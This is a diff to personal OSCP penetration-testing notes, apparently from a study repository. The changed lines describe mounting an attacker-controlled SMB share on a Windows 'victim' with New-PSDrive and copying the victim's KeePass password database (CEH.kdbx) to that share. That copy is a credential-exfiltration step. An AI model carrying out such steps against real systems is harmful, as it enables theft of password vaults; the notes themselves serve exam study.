foxed/oscp-notes/reference.md

 here we start up a share called 'Heyo'

-you need to use tickmarks with the pwd
+you need to use tickmarks with the pwd. note that the names "Heyo" and "Neigh" are completely arbitrary.

 on windows (our target/victim):

-`New-PSDrive -Name "Neigh" -PSProvider "FileSystem" -Root "\\my.kali.ip\Heyo" ` `cd Neigh`
+`New-PSDrive -Name "Neigh" -PSProvider "FileSystem" -Root "\\my.kali.ip\Heyo" `

+`cd Neigh`

 `PS Neigh:\> cp C:\Users\victim\Documents\CEH.kdbx .`